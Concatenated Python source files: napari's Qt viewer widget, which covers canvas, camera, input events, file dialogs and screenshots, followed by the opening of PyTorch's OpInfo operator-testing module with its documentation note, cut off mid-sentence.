self.dockConsole.deleteLater() event.accept() def viewbox_key_event(event): """ViewBox key event handler. Parameters ---------- event : napari.utils.event.Event The napari event that triggered this method. """ return
import os.path from copy import copy from pathlib import Path import numpy as np from qtpy.QtCore import QCoreApplication, QSize, Qt from qtpy.QtGui import QCursor, QGuiApplication from qtpy.QtWidgets import ( QFileDialog, QMessageBox, QSplitter, QVBoxLayout, QWidget, ) from vispy.scene import ArcballCamera, PanZoomCamera, SceneCanvas from vispy.visuals.transforms import ChainTransform from ..resources import get_stylesheet from ..utils import perf from ..utils.interactions import ( ReadOnlyWrapper, mouse_move_callbacks, mouse_press_callbacks, mouse_release_callbacks, mouse_wheel_callbacks, ) from ..utils.io import imsave from ..utils.key_bindings import components_to_key_combo from ..utils.theme import template from .dialogs.qt_about_key_bindings import QtAboutKeyBindings from .dialogs.screenshot_dialog import ScreenshotDialog from .tracing.qt_performance import QtPerformance from .utils import QImg2array, circle_pixmap, square_pixmap from .widgets.qt_dims import QtDims from .widgets.qt_layerlist import QtLayerList from .widgets.qt_viewer_buttons import QtLayerButtons, QtViewerButtons from .widgets.qt_viewer_dock_widget import QtViewerDockWidget from .._vispy import VispyAxesVisual, create_vispy_visual # isort:skip class KeyModifierFilterSceneCanvas(SceneCanvas): """SceneCanvas overriding VisPy when mouse wheel events have modifiers.""" def _process_mouse_event(self, event): if event.type == 'mouse_wheel' and len(event.modifiers) > 0: return super()._process_mouse_event(event) class QtViewer(QSplitter): """Qt view for the napari Viewer model. Parameters ---------- viewer : napari.components.ViewerModel Napari viewer containing the rendered scene, layers, and controls. Attributes ---------- canvas : vispy.scene.SceneCanvas Canvas for rendering the current view. console : QtConsole iPython console terminal integrated into the napari GUI. controls : QtLayerControlsContainer Qt view for GUI controls. dims : napari.qt_dims.QtDims Dimension sliders; Qt View for Dims model. dockConsole : QtViewerDockWidget QWidget wrapped in a QDockWidget with forwarded viewer events. aboutKeybindings : QtAboutKeybindings Key bindings for the 'About' Qt dialog. dockLayerControls : QtViewerDockWidget QWidget wrapped in a QDockWidget with forwarded viewer events. dockLayerList : QtViewerDockWidget QWidget wrapped in a QDockWidget with forwarded viewer events. layerButtons : QtLayerButtons Button controls for napari layers. layers : QtLayerList Qt view for LayerList controls. layer_to_visual : dict Dictionary mapping napari layers with their corresponding vispy_layers. view : vispy scene widget View displayed by vispy canvas. Adds a vispy ViewBox as a child widget. viewer : napari.components.ViewerModel Napari viewer containing the rendered scene, layers, and controls. viewerButtons : QtViewerButtons Button controls for the napari viewer. """ raw_stylesheet = get_stylesheet() def __init__(self, viewer): from .layer_controls import QtLayerControlsContainer super().__init__() self.setAttribute(Qt.WA_DeleteOnClose) QCoreApplication.setAttribute( Qt.AA_UseStyleSheetPropagationInWidgetStyles, True ) self.viewer = viewer self.dims = QtDims(self.viewer.dims) self.controls = QtLayerControlsContainer(self.viewer) self.layers = QtLayerList(self.viewer.layers) self.layerButtons = QtLayerButtons(self.viewer) self.viewerButtons = QtViewerButtons(self.viewer) self._console = None layerList = QWidget() layerList.setObjectName('layerList') layerListLayout = QVBoxLayout() layerListLayout.addWidget(self.layerButtons) layerListLayout.addWidget(self.layers) layerListLayout.addWidget(self.viewerButtons) layerListLayout.setContentsMargins(8, 4, 8, 6) layerList.setLayout(layerListLayout) self.dockLayerList = QtViewerDockWidget( self, layerList, name='layer list', area='left', allowed_areas=['left', 'right'], ) self.dockLayerControls = QtViewerDockWidget( self, self.controls, name='layer controls', area='left', allowed_areas=['left', 'right'], ) self.dockConsole = QtViewerDockWidget( self, QWidget(), name='console', area='bottom', allowed_areas=['top', 'bottom'], shortcut='Ctrl+Shift+C', ) self.dockConsole.setVisible(False) # because the console is loaded lazily in the @getter, this line just # gets (or creates) the console when the dock console is made visible. self.dockConsole.visibilityChanged.connect( lambda visible: self.console if visible else None ) self.dockLayerControls.visibilityChanged.connect(self._constrain_width) self.dockLayerList.setMaximumWidth(258) self.dockLayerList.setMinimumWidth(258) self.dockPerformance = self._create_performance_dock_widget() # This dictionary holds the corresponding vispy visual for each layer self.layer_to_visual = {} self.viewerButtons.consoleButton.clicked.connect( self.toggle_console_visibility ) self.canvas = KeyModifierFilterSceneCanvas( keys=None, vsync=True, parent=self ) self.canvas.events.ignore_callback_errors = False self.canvas.events.draw.connect(self.dims.enable_play) self.canvas.native.setMinimumSize(QSize(200, 200)) self.canvas.context.set_depth_func('lequal') self.canvas.connect(self.on_mouse_move) self.canvas.connect(self.on_mouse_press) self.canvas.connect(self.on_mouse_release) self.canvas.connect(self.on_key_press) self.canvas.connect(self.on_key_release) self.canvas.connect(self.on_mouse_wheel) self.canvas.connect(self.on_draw) self.view = self.canvas.central_widget.add_view() self._update_camera() self.axes = VispyAxesVisual( self.viewer.axes, self.viewer.dims, parent=self.view.scene, order=1e6, ) main_widget = QWidget() main_layout = QVBoxLayout() main_layout.setContentsMargins(10, 22, 10, 2) main_layout.addWidget(self.canvas.native) main_layout.addWidget(self.dims) main_layout.setSpacing(10) main_widget.setLayout(main_layout) self.setOrientation(Qt.Vertical) self.addWidget(main_widget) self._last_visited_dir = str(Path.home()) self._cursors = { 'cross': Qt.CrossCursor, 'forbidden': Qt.ForbiddenCursor, 'pointing': Qt.PointingHandCursor, 'standard': QCursor(), } self._update_palette() self.viewer.events.interactive.connect(self._on_interactive) self.viewer.events.cursor.connect(self._on_cursor) self.viewer.events.reset_view.connect(self._on_reset_view) self.viewer.events.palette.connect(self._update_palette) self.viewer.layers.events.reordered.connect(self._reorder_layers) self.viewer.layers.events.added.connect(self._add_layer) self.viewer.layers.events.removed.connect(self._remove_layer) self.viewer.dims.events.camera.connect( lambda event: self._update_camera() ) # stop any animations whenever the layers change self.viewer.events.layers_change.connect(lambda x: self.dims.stop()) self.setAcceptDrops(True) def _create_performance_dock_widget(self): """Create the dock widget that shows performance metrics. """ if not perf.USE_PERFMON: return None return QtViewerDockWidget( self, QtPerformance(), name='performance', area='bottom', shortcut='Ctrl+Shift+P', ) @property def console(self): """QtConsole: iPython console terminal integrated into the napari GUI. """ if self._console is None: from .widgets.qt_console import QtConsole self.console = QtConsole({'viewer': self.viewer}) return self._console @console.setter def console(self, console): self._console = console self.dockConsole.widget = console self._update_palette() def _constrain_width(self, event): """Allow the layer controls to be wider, only if floated. Parameters ---------- event : napari.utils.event.Event The napari event that triggered this method. """ if self.dockLayerControls.isFloating(): self.controls.setMaximumWidth(700) else: self.controls.setMaximumWidth(220) def _add_layer(self, event): """When a layer is added, set its parent and order. Parameters ---------- event : napari.utils.event.Event The napari event that triggered this method. """ layers = event.source layer = event.item vispy_layer = create_vispy_visual(layer) vispy_layer.node.parent = self.view.scene vispy_layer.order = len(layers) - 1 self.layer_to_visual[layer] = vispy_layer def _remove_layer(self, event): """When a layer is removed, remove its parent. Parameters ---------- event : napari.utils.event.Event The napari event that triggered this method. """ layer = event.item vispy_layer = self.layer_to_visual[layer] vispy_layer.node.transforms = ChainTransform() vispy_layer.node.parent = None del vispy_layer self._reorder_layers(None) def _reorder_layers(self, event): """When the list is reordered, propagate changes to draw order. Parameters ---------- event : napari.utils.event.Event The napari event that triggered this method. """ for i, layer in enumerate(self.viewer.layers): vispy_layer = self.layer_to_visual[layer] vispy_layer.order = i self.canvas._draw_order.clear() self.canvas.update() def _update_camera(self): """Update the viewer camera.""" if self.viewer.dims.ndisplay == 3: # Set a 3D camera if not isinstance(self.view.camera, ArcballCamera): self.view.camera = ArcballCamera(name="ArcballCamera", fov=0) # flip y-axis to have correct alignment # self.view.camera.flip = (0, 1, 0) self.view.camera.viewbox_key_event = viewbox_key_event self.viewer.reset_view() else: # Set 2D camera if not isinstance(self.view.camera, PanZoomCamera): self.view.camera = PanZoomCamera( aspect=1, name="PanZoomCamera" ) # flip y-axis to have correct alignment self.view.camera.flip = (0, 1, 0) self.view.camera.viewbox_key_event = viewbox_key_event self.viewer.reset_view() def _save_layers_dialog(self, selected=False): """Save layers (all or selected) to disk, using ``LayerList.save()``. Parameters ---------- selected : bool If True, only layers that are selected in the viewer will be saved. By default, all layers are saved. """ msg = '' if not len(self.viewer.layers): msg = "There are no layers in the viewer to save" elif selected and not len(self.viewer.layers.selected): msg = ( 'Please select one or more layers to save,' '\nor use "Save all layers..."' ) if msg: QMessageBox.warning(self, "Nothing to save", msg, QMessageBox.Ok) return filename, _ = QFileDialog.getSaveFileName( parent=self, caption=f'Save {"selected" if selected else "all"} layers', directory=self._last_visited_dir, # home dir by default ) if filename: self.viewer.layers.save(filename, selected=selected) def screenshot(self, path=None): """Take currently displayed screen and convert to an image array. Parameters ---------- path : str Filename for saving screenshot image. Returns ------- image : array Numpy array of type ubyte and shape (h, w, 4). Index [0, 0] is the upper-left corner of the rendered region. """ img = QImg2array(self.canvas.native.grabFramebuffer()) if path is not None: imsave(path, img) # scikit-image imsave method return img def _screenshot_dialog(self): """Save screenshot of current display, default .png""" dial = ScreenshotDialog(self.screenshot, self, self._last_visited_dir) if dial.exec_(): self._last_visited_dir = os.path.dirname(dial.selectedFiles()[0]) def _open_files_dialog(self): """Add files from the menubar.""" filenames, _ = QFileDialog.getOpenFileNames( parent=self, caption='Select file(s)...', directory=self._last_visited_dir, # home dir by default ) if (filenames != []) and (filenames is not None): self.viewer.open(filenames) def _open_files_dialog_as_stack_dialog(self): """Add files as a stack, from the menubar.""" filenames, _ = QFileDialog.getOpenFileNames( parent=self, caption='Select files...', directory=self._last_visited_dir, # home dir by default ) if (filenames != []) and (filenames is not None): self.viewer.open(filenames, stack=True) def _open_folder_dialog(self): """Add a folder of files from the menubar.""" folder = QFileDialog.getExistingDirectory( parent=self, caption='Select folder...', directory=self._last_visited_dir, # home dir by default ) if folder not in {'', None}: self.viewer.open([folder]) def _on_interactive(self, event): """Link interactive attributes of view and viewer. Parameters ---------- event : napari.utils.event.Event The napari event that triggered this method. """ self.view.interactive = self.viewer.interactive def _on_cursor(self, event): """Set the appearance of the mouse cursor. Parameters ---------- event : napari.utils.event.Event The napari event that triggered this method. """ cursor = self.viewer.cursor if cursor == 'square': size = self.viewer.cursor_size # make sure the square fits within the current canvas if size < 8 or size > ( min(*self.viewer.window.qt_viewer.canvas.size) - 4 ): q_cursor = self._cursors['cross'] else: q_cursor = QCursor(square_pixmap(size)) elif cursor == 'circle': size = self.viewer.cursor_size q_cursor = QCursor(circle_pixmap(size)) else: q_cursor = self._cursors[cursor] self.canvas.native.setCursor(q_cursor) def _on_reset_view(self, event): """Reset view of the rendered scene. Parameters ---------- event : napari.utils.event.Event The napari event that triggered this method. """ if isinstance(self.view.camera, ArcballCamera): quat = self.view.camera._quaternion.create_from_axis_angle( *event.quaternion ) self.view.camera._quaternion = quat self.view.camera.center = event.center self.view.camera.scale_factor = event.scale_factor else: # Assumes default camera has the same properties as PanZoomCamera self.view.camera.rect = event.rect def _update_palette(self, event=None): """Update the napari GUI theme.""" # template and apply the primary stylesheet themed_stylesheet = template( self.raw_stylesheet, **self.viewer.palette ) if self._console is not None: self.console._update_palette( self.viewer.palette, themed_stylesheet ) self.setStyleSheet(themed_stylesheet) self.canvas.bgcolor = self.viewer.palette['canvas'] self.viewer.axes.background_color = self.viewer.palette['canvas'] def toggle_console_visibility(self, event=None): """Toggle console visible and not visible. Imports the console the first time it is requested. """ # force instantiation of console if not already instantiated _ = self.console viz = not self.dockConsole.isVisible() # modulate visibility at the dock widget level as console is docakable self.dockConsole.setVisible(viz) if self.dockConsole.isFloating(): self.dockConsole.setFloating(True) self.viewerButtons.consoleButton.setProperty( 'expanded', self.dockConsole.isVisible() ) self.viewerButtons.consoleButton.style().unpolish( self.viewerButtons.consoleButton ) self.viewerButtons.consoleButton.style().polish( self.viewerButtons.consoleButton ) def show_key_bindings_dialog(self, event=None): dialog = QtAboutKeyBindings(self.viewer, parent=self) dialog.show() @property def _canvas2world_scale(self): """list: Scale factors from canvas pixels to world coordinates.""" if isinstance(self.view.camera, PanZoomCamera): return 1 / self.view.camera.transform.scale[0] elif isinstance(self.view.camera, ArcballCamera): # Note magic number 598 is empirically determined so that # Arcball camera and PanZoomCamera match scale_factor = self.view.camera.scale_factor / 598 return scale_factor else: raise ValueError( f'Camera type {type(self.view.camera)} not recognized' ) def _map_canvas2world(self, position): """Map position from canvas pixels into world coordinates. Parameters ---------- position : 2-tuple Position in canvas (x, y). Returns ------- coords : tuple Position in world coordinates, matches the total dimensionality of the viewer. """ nd = self.viewer.dims.ndisplay transform = self.view.camera.transform.inverse mapped_position = transform.map(list(position))[:nd] position_world_slice = mapped_position[::-1] position_world = copy(self.viewer.dims.point) for i, d in enumerate(self.viewer.dims.displayed): position_world[d] = position_world_slice[i] return tuple(position_world) @property def _canvas_corners_in_world(self): """Location of the corners of canvas in world coordinates. Returns ------- corners : 2-tuple Coordinates of top left and bottom right canvas pixel in the world. """ # Find corners of canvas in world coordinates top_left = self._map_canvas2world([0, 0]) bottom_right = self._map_canvas2world(self.canvas.size) return np.array([top_left, bottom_right]) def on_mouse_wheel(self, event): """Called whenever mouse wheel activated in canvas. Parameters ---------- event : qtpy.QtCore.QEvent """ if event.pos is None: return event = ReadOnlyWrapper(event) mouse_wheel_callbacks(self.viewer, event) layer = self.viewer.active_layer if layer is not None: # set cursor position in world coordinates layer.position = self._map_canvas2world(list(event.pos)) mouse_wheel_callbacks(layer, event) def on_mouse_press(self, event): """Called whenever mouse pressed in canvas. Parameters ---------- event : napari.utils.event.Event The napari event that triggered this method. """ if event.pos is None: return event = ReadOnlyWrapper(event) mouse_press_callbacks(self.viewer, event) layer = self.viewer.active_layer if layer is not None: # set cursor position in world coordinates layer.position = self._map_canvas2world(list(event.pos)) mouse_press_callbacks(layer, event) def on_mouse_move(self, event): """Called whenever mouse moves over canvas. Parameters ---------- event : napari.utils.event.Event The napari event that triggered this method. """ if event.pos is None: return mouse_move_callbacks(self.viewer, event) layer = self.viewer.active_layer if layer is not None: # set cursor position in world coordinates layer.position = self._map_canvas2world(list(event.pos)) mouse_move_callbacks(layer, event) def on_mouse_release(self, event): """Called whenever mouse released in canvas. Parameters ---------- event : napari.utils.event.Event The napari event that triggered this method. """ if event.pos is None: return mouse_release_callbacks(self.viewer, event) layer = self.viewer.active_layer if layer is not None: # set cursor position in world coordinates layer.position = self._map_canvas2world(list(event.pos)) mouse_release_callbacks(layer, event) def on_key_press(self, event): """Called whenever key pressed in canvas. Parameters ---------- event : napari.utils.event.Event The napari event that triggered this method. """ if ( event.native is not None and event.native.isAutoRepeat() and event.key.name not in ['Up', 'Down', 'Left', 'Right'] ) or event.key is None: # pass if no key is present or if key is held down, unless the # key being held down is one of the navigation keys # this helps for scrolling, etc. return combo = components_to_key_combo(event.key.name, event.modifiers) self.viewer.press_key(combo) def on_key_release(self, event): """Called whenever key released in canvas. Parameters ---------- event : napari.utils.event.Event The napari event that triggered this method. """ if event.key is None or ( # on linux press down is treated as multiple press and release event.native is not None and event.native.isAutoRepeat() ): return combo = components_to_key_combo(event.key.name, event.modifiers) self.viewer.release_key(combo) def on_draw(self, event): """Called whenever the canvas is drawn. This is triggered from vispy whenever new data is sent to the canvas or the camera is moved and is connected in the `QtViewer`. """ scale_factor = self._canvas2world_scale if self.viewer.axes.visible: self.axes.update_scale(scale_factor) for layer in self.viewer.layers: if layer.ndim <= self.viewer.dims.ndim: layer._update_draw( scale_factor=scale_factor, corner_pixels=self._canvas_corners_in_world[ :, -layer.ndim : ], shape_threshold=self.canvas.size, ) def keyPressEvent(self, event): """Called whenever a key is pressed. Parameters ---------- event : qtpy.QtCore.QEvent Event from the Qt context. """ self.canvas._backend._keyEvent(self.canvas.events.key_press, event) event.accept() def keyReleaseEvent(self, event): """Called whenever a key is released. Parameters ---------- event : qtpy.QtCore.QEvent Event from the Qt context. """ self.canvas._backend._keyEvent(self.canvas.events.key_release, event) event.accept() def dragEnterEvent(self, event): """Ignore event if not dragging & dropping a file or URL to open. Using event.ignore() here allows the event to pass through the parent widget to its child widget, otherwise the parent widget would catch the event and not pass it on to the child widget. Parameters ---------- event : qtpy.QtCore.QEvent Event from the Qt context. """ if event.mimeData().hasUrls(): event.accept() else: event.ignore() def dropEvent(self, event): """Add local files and web URLS with drag and drop. Parameters ---------- event : qtpy.QtCore.QEvent Event from the Qt context. """ shift_down = QGuiApplication.keyboardModifiers() & Qt.ShiftModifier filenames = [] for url in event.mimeData().urls(): if url.isLocalFile(): filenames.append(url.toLocalFile()) else: filenames.append(url.toString()) self.viewer.open(filenames, stack=bool(shift_down)) def closeEvent(self, event): """Cleanup and close. Parameters ---------- event : qtpy.QtCore.QEvent Event from the Qt context. """ self.layers.close() # if the viewer.QtDims object is playing an axis, we need to terminate # the AnimationThread before close, otherwise it will cauyse a segFault # or Abort trap. (calling stop() when no animation is occurring is also # not a problem) self.dims.stop() self.canvas.native.deleteLater() if self._console is not None: self.console.close() self.dockConsole.deleteLater() event.accept() def viewbox_key_event(event): """ViewBox key event handler. Parameters ---------- event : napari.utils.event.Event The napari event that triggered this method. """ return
from functools import wraps, partial from itertools import product, chain, islice import itertools import collections import copy from enum import Enum import operator import random import unittest import math import torch import numpy as np from torch._six import inf import collections.abc from typing import Any, Callable, Dict, List, Optional, Sequence, Tuple, Union, Iterable from dataclasses import dataclass, asdict from torchgen.utils import dataclass_repr from torch.testing import make_tensor from torch.testing._internal.common_dtype import ( _dispatch_dtypes, floating_types, floating_types_and, complex_types, floating_and_complex_types, floating_and_complex_types_and, all_types_and_complex_and, all_types_and, all_types_and_complex, integral_types_and, all_types, double_types, empty_types, complex_types_and, integral_types ) from torch.testing._internal.common_device_type import \ (onlyCUDA, onlyNativeDeviceTypes, disablecuDNN, skipCUDAIfNoMagma, skipCUDAIfNoMagmaAndNoCusolver, skipCUDAIfNoCusolver, skipCPUIfNoLapack, skipCPUIfNoFFT, skipCUDAIfRocm, skipCUDAIf, precisionOverride, skipCPUIfNoMklSparse, toleranceOverride, tol, has_cusolver) from torch.testing._internal.common_cuda import ( CUDA11OrLater, SM53OrLater, SM60OrLater, with_tf32_off, TEST_CUDNN, _get_torch_cuda_version, _get_magma_version) from torch.testing._internal.common_utils import \ (is_iterable_of_tensors, random_symmetric_matrix, random_symmetric_psd_matrix, make_fullrank_matrices_with_distinct_singular_values, random_symmetric_pd_matrix, make_symmetric_matrices, make_symmetric_pd_matrices, random_square_matrix_of_rank, TEST_WITH_ROCM, IS_WINDOWS, IS_MACOS, TEST_SCIPY, torch_to_numpy_dtype_dict, TEST_WITH_ASAN, GRADCHECK_NONDET_TOL, slowTest, noncontiguous_like, freeze_rng_state) import torch.testing._internal.opinfo_helper as opinfo_helper import torch._refs as refs # noqa: F401 import torch._refs.nn.functional import torch._refs.special import torch._prims as prims # noqa: F401 from torch.utils._pytree import tree_flatten from distutils.version import LooseVersion has_scipy_fft = False if TEST_SCIPY: from scipy import stats import scipy.spatial import scipy.special try: import scipy.fft has_scipy_fft = True except ModuleNotFoundError: pass # Reasonable testing sizes for dimensions L = 20 M = 10 S = 5 # Unique value to distinguish default from anything else _NOTHING = object() class DecorateInfo(object): """Describes which test, or type of tests, should be wrapped in the given decorators when testing an operator. Any test that matches all provided arguments will be decorated. The decorators will only be applied if the active_if argument is True.""" __slots__ = ['decorators', 'cls_name', 'test_name', 'device_type', 'dtypes', 'active_if'] def __init__(self, decorators, cls_name=None, test_name=None, *, device_type=None, dtypes=None, active_if=True): self.decorators = list(decorators) if isinstance(decorators, collections.abc.Sequence) else [decorators] self.cls_name = cls_name self.test_name = test_name self.device_type = device_type self.dtypes = dtypes self.active_if = active_if # Validate dtypes if self.dtypes is not None: for dtype in self.dtypes: assert isinstance(dtype, torch.dtype) def is_active(self, cls_name, test_name, device_type, dtype): return ( self.active_if and (self.cls_name is None or self.cls_name == cls_name) and (self.test_name is None or self.test_name == test_name) and (self.device_type is None or self.device_type == device_type) and (self.dtypes is None or dtype in self.dtypes) ) # FIXME # Note: historically the 'input' kwarg had to be a Tensor or TensorList, but we are trying # to support scalar inputs, too. Some tests still depend on 'input' being a Tensor # or TensorList, however. class SampleInput(object): """Represents sample inputs to a function.""" __slots__ = ['input', 'args', 'kwargs', 'output_process_fn_grad', 'broadcasts_input', 'name'] def __init__(self, input, *, args=tuple(), kwargs=None, output_process_fn_grad=lambda x: x, broadcasts_input=False, name=""): # input is the first input to the op and is typically either a Tensor or TensorList (Sequence[Tensor]). # This follows the typical pattern where for Tensor inputs op(t, ...) = t.op(...). self.input = input self.args = args self.kwargs = kwargs if kwargs is not None else {} self.output_process_fn_grad = output_process_fn_grad self.name = name # Specifies if `self.input` is broadcasted or not, # given that the operator supports broadcasting. # This field is used to verify the behavior for inplace variant. # # If a SampleInput is marked with `broadcasts_input=True`, # it is verified that we get a `RuntimerError` with this sample, # and inplace variant. Also inplace grad{grad} tests are skipped, # for such inputs (as they will error out otherwise). self.broadcasts_input = broadcasts_input def _repr_helper(self, formatter): # Helper function to return the details of the SampleInput as `str` # It consolidates all the fields of SampleInput and allows, # formatting the fields like `input`, `args`, etc with `formatter` # callable to customize the representation. # Look at `summary` method for example. arguments = [ f'input={formatter(self.input)}', f'args={formatter(self.args)}', f'kwargs={formatter(self.kwargs)}', f'output_process_fn_grad={self.output_process_fn_grad}', f'broadcasts_input={self.broadcasts_input}', f'name={repr(self.name)}'] return f'SampleInput({', '.join(a for a in arguments if a is not None)})' def __repr__(self): return self._repr_helper(lambda x: x) def summary(self): # Returns the SampleInput details in a more # friendly format. # It formats `Tensor` and `TensorList` # in a more condensed representation. def formatter(arg): # Format any instance of `Tensor` (standalone, in list, or in dict) # by Tensor[TensorShape] # Eg. Tensor with shape (3, 4) is formatted as Tensor[3, 4] if isinstance(arg, torch.Tensor): shape = str(tuple(arg.shape)).replace('(', '').replace(')', '') return f"Tensor[{shape}]" elif isinstance(arg, dict): return {k: formatter(v) for k, v in arg.items()} elif is_iterable_of_tensors(arg): return "TensorList[" + ", ".join(map(formatter, arg)) + "]" elif isinstance(arg, (list, tuple)): # Handle list, tuple return "(" + ",".join(map(formatter, arg)) + ")" return repr(arg) return self._repr_helper(formatter) # Applies the transform f(t) -> t to each tensor and dtype in the SampleInput def transform(self, f): def tt(t): def _tt(t): with torch.no_grad(): return f(t) if isinstance(t, torch.Tensor): return _tt(t) elif isinstance(t, torch.dtype): return _tt(t) elif isinstance(t, list): return list(map(tt, t)) elif isinstance(t, tuple): return tuple(map(tt, t)) elif isinstance(t, dict): return {k: tt(v) for k, v in t.items()} else: return t sample_tt_input, tt_args, tt_kwargs = tt(self.input), tt(self.args), tt(self.kwargs) # Note the transformed SampleInput assumes metadata like output_process_fn_grad is still valid! return SampleInput( sample_tt_input, args=tt_args, kwargs=tt_kwargs, output_process_fn_grad=self.output_process_fn_grad, broadcasts_input=self.broadcasts_input, name=self.name + "_transformed") # Returns the NumPy version of the sample input object in the form of a tuple: (input, args, kwargs) # Converts tensors to ndarrays by calling .detach().cpu().numpy() on them # Converts dtypes by remapping them using torch_to_numpy_dtype_dict def numpy(self): def to_numpy(t): if isinstance(t, torch.Tensor): if t.dtype is torch.bfloat16: return t.detach().cpu().to(torch.float32).numpy() if t.dtype is torch.chalf: return t.detach().cpu().to(torch.cfloat).numpy() return t.detach().cpu().numpy() elif isinstance(t, torch.dtype): return torch_to_numpy_dtype_dict[t] return t return self.transform(to_numpy) def noncontiguous(self): def to_noncontiguous(t): if isinstance(t, torch.Tensor): return noncontiguous_like(t) elif isinstance(t, torch.dtype): return t return t return self.transform(to_noncontiguous) class ErrorInput(object): """ A SampleInput that will cause the operation to throw an error plus information about the resulting error. """ __slots__ = ['sample_input', 'error_type', 'error_regex'] def __init__(self, sample_input, *, error_type=RuntimeError, error_regex): self.sample_input = sample_input self.error_type = error_type self.error_regex = error_regex class AliasInfo(object): """Class holds alias information. For example, torch.abs -> torch.absolute, torch.Tensor.absolute, torch.Tensor.absolute_ """ def __init__(self, alias_name): self.name = alias_name self.op = _getattr_qual(torch, alias_name) self.method_variant = getattr(torch.Tensor, alias_name, None) self.inplace_variant = getattr(torch.Tensor, alias_name + "_", None) def __call__(self, *args, **kwargs): return self.op(*args, **kwargs) # Extension of getattr to support qualified names # e.g. _getattr_qual(torch, 'linalg.norm') -> torch.linalg.norm def _getattr_qual(obj, name, default=_NOTHING): try: for path in name.split('.'): obj = getattr(obj, path) return obj except AttributeError: if default is not _NOTHING: return default else: raise # test if a tensor is close to an integer def close_to_int(x, eps=0.1): if x.is_complex(): y = torch.abs(torch.view_as_complex(torch.frac(torch.view_as_real(x)))) else: y = torch.abs(torch.frac(x)) return (y < eps) | (y > (1 - eps)) NumericsFilter = collections.namedtuple('NumericsFilter', ['condition', 'safe_val']) # Note [OpInfos] # ~~~~~~~~~~~~~~ # # The majority of this note was written shortly after the PyTorch 1.9 release. # If you notice it's out-of-date or think it could be improved then please # file an issue. # # See also: the OpInfo tracker (https://github.com/pytorch/pytorch/issues/54261) # See also: "Writing Test Templates" in common_device_type.py to learn how to # parametrize a test template using OpInfos. # See also: PyTorch's GitHub wiki on running and writing tests # https://github.com/pytorch/pytorch/wiki/Running-and-writing-tests # See also: ModuleInfos, OpInfo's sister class, defined in common_modules.py # # An OpInfo is a collection of metadata related to a PyTorch operator. This # metadata is used to generate tests that validate properties of the operator, # like if it implements the correct gradient formula. # # WHY OPINFOS? # ~~~~~~~~~~~~ # # OpInfos are principally intended to do three things: # # 1) to allow systematic testing over all PyTorch's operators # 2) to simplify operating testing by autogenerating many tests # 3) to allow systems (like autograd, torchscript, fx, nnc...) to test # against every PyTorch operator # # All these goals are still a work in progress. Not every operator has an # OpInfo, and some operator tests that could be automatically generated # still have to be written manually. # # It's helpful to understand that OpInfos are both about test simplification and # modularity. PyTorch is a complicated framework with many interrelated systems, # too many for any one person to keep track of. An OpInfo can be thought of as the # interface between an operator implementer and those other systems. Instead of # requiring the implementer of torch.foo understand how to test its forward # mode AD or NNC support that's typically handled automatically just by # defining an OpInfo. # # It's often surprising to OpInfo writers that just implementing an OpInfo # typically can't verify an operator is actually implemented correctly: # # "If an OpInfo doesn't validate my op works as expected, what's the point # of it?" # # But the point of is the above. OpInfos are intended to let you focus on testing # the operator logic you're familiar with instead of having to write tests for # how the operator interacts with each of PyTorch's many systems. # # And, OK, it turns out that SOMETIMES just writing an OpInfo DOES # validate your op works as expected, but that's only in special # cases. See below for details. # # WHAT'S AN OPINFO? # ~~~~~~~~~~~~~~~~~ # # So what is an OpInfo? It's a Python class that describes an operator's properties, # like which dtypes it supports on the CPU and whether it has any aliases. # These properties can be divided into three categories: # # 1) Metadata describing the operator, like the operator's name and if it # "supports" the out kwarg. # 2) Test directives, like "skips" that tell the test suite to skip some # tests. # 3) A "sample inputs" function that generates valid inputs for the operator. # # OpInfo attributes are described in more detail below. # # THE SAMPLE INPUTS FUNCTION # ~~~~~~~~~~~~~~~~~~~~~~~~~~ # # The "sample inputs" function merits special elaboration. This function is # crucial to testing with OpInfos. A typical OpInfo test has to treat the operator # as a black box. There's no structure for the test to understand or exploit. # Without "sample inputs" it wouldn't even know how to call the OpInfo's # operator. The sample input function saves the day by providing different # "SampleInputs" that can be used to call the operator. A sample input # function should have the following signature: # # def sample_inputs_foo(op_info, device, dtype, requires_grad, **kwargs): # # And should return an iterable of SampleInputs (see the class description # above). Each SampleInput defines an "input", "args", "kwargs", an # "output_process_fn_grad" function, the "broadcasts_input" bool and a # "name". # # All the "sample_inputs" functions are invoked within a `torch.no_grad()` # environment for efficiency and correctness. As such remember to set the # "requires_grad" flag on the inputs **after** performing any transformations # on them. # # The "input" is the first argument to the operator, or the tensor that # the method or inplace variants of the operator should be called on, and # should be on the requested device, of the requested dtype, and its # requires_grad attribute should be set to the requires_grad argument. # # "args" should contain positional arguments, and "kwargs" keyword arguments. # # "output_process_fn_grad" has an interesting name. It's a function that maps # the operator's output (when given the input, args, and kwargs) to the # portion of the output to gradcheck. For example, consider an operator # like torch.linalg.slogdet # (https://pytorch.org/docs/master/generated/torch.linalg.slogdet.html). # This operator returns a tuple of two tensors, but the first tensor # cannot be backwarded through. Its "output_process_fn_grad" filters # this output tuple to just the second argument, which we can call backward # on. Functions that produce a single tensor can ignore this argument. # # "broadcasts_input" is a bool indicated if the SampleInput causes the operator # to broadcast the "input" argument. This is important for tests to understand # because inplace variants of operations throw a runtime error if they # would broadcast their input arguments, so tests that work with inplace # variants filter SampleInputs that broadcast their input. # # "name" is a string that's just used for debugging. It appears when printing # the SampleInput. # # Sample inputs are designed to be used with many tests, some # that are very time consuming, so they should be a small # set with small tensors. An elaborated set of sample inputs # can be specified using the "reference_inputs_func" attribute. # The "reference inputs" for an operation are an extended # set of sample inputs that can more exhausively test an # operator. They are used by only a few tests that are careful # not to take too long to run. Adding reference inputs # is highly encouraged! # # THE (OPTIONAL) ERROR INPUTS FUNCTION # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # # OpInfos may optionally specify "error inputs" through an error function. If # specified test_errors in test_ops.py will call the op with these inputs # and validate that the desired error is thrown. # # Error inputs automate a common testing pattern where multiple inputs are # passed to an operation and the errors they thrown are reviewed. Tests # written in this style should be ported to the new OpInfo pattern. # # Error inputs are specified using the ErrorInputs class, which contains # a SampleInput (see above) and data about the expected error. # # OPINFO FILE ORGANIZATION # ~~~~~~~~~~~~~~~~~~~~~~~~ # # All OpInfos are currently defined in this file. Most OpInfo tests are defined # in test_ops.py, but some system-specific tests are defined in those # systems' test files, and subclass-specific tests are defined in the test # file that corresponds to that subclass (see the below). # Expect a reorganization in the future. # # WHAT'S TESTED? # ~~~~~~~~~~~~~~ # # Every OpInfo in the op_db sequence has the following properties validated in # test_ops.py: # # - that its supported dtypes are specified correctly # - that the operation produces the same results when called with noncontiguous inputs # - that it supports the out= argument properly (if it allows out=), # see 